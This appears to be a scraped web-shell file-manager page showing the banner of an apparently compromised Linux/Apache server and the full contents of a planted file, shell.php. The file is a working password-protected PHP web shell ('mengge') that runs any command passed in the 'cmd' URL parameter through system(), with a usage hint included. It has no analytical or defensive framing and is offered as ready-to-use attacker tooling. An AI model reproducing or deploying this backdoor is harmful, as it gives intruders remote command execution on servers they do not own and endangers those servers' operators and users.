HEX
Server: Apache/2.2.34 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141
System: Linux Kou-Etsu-Dou 4.4.59+ #25556 SMP PREEMPT Thu Mar 4 18:03:46 CST 2021 x86_64
User: hosam (1026)
PHP: 7.2.29
Disabled: NONE
$ pwd: /volume1/web1/
Upload Files
File: /volume1/web1/shell.php
<?php
$password = "mengge";
if (!isset($_GET["pass"]) || $_GET["pass"] !== $password) {
    http_response_code(403);
    exit("Forbidden");
}
if (isset($_GET["cmd"])) {
    header("Content-Type: text/plain");
    system($_GET["cmd"]);
} else {
    echo "WebShell Ready. Use ?pass=mengge&cmd=whoami";
}
?>
@ Telegram